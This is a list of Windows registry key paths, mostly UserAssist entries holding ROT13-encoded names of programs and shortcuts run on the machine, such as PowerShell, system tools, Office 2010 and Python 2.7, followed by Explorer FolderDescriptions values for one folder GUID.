HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\Jvaqbjf Wbheany.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf CbjreFuryy Zbqhyrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Qvtvgny Pregvsvpngr sbe ION Cebwrpgf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Pyvc Betnavmre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr Cvpgher Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Bssvpr Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\VQYR (Clguba THV).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Zbqhyr Qbpf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Clguba (pbzznaq yvar).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong.pbz\Npebong.pbz.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf Wbheany\Wbheany.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NOQ94SO-R7Q6-84N6-N997-P918RQQR0NR5}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO044OSQ-25O7-2SNN-22N8-6371N93R0456}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NN47365-O2O3-1961-69RO-S866R376O12S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OQ3S924R-55SO-N1ON-9QR6-O50S9S2460NP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{15067OP1-P5N8-425R-37P6-SN0O891674S9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erpqvfp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfen.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxBssvprQvtvgnyFSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\ZFGBER.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxFrgYnathntrSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxJkcSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BVF.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\zvpebfbsg funerq\BSSVPR14\Bssvpr Frghc Pbagebyyre\cebzb.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{53123611-QN37-S8QN-SNP9-03R76QO9Q64Q}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clguba.rkr
HKEY_CLASSES_ROOT\Applications\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
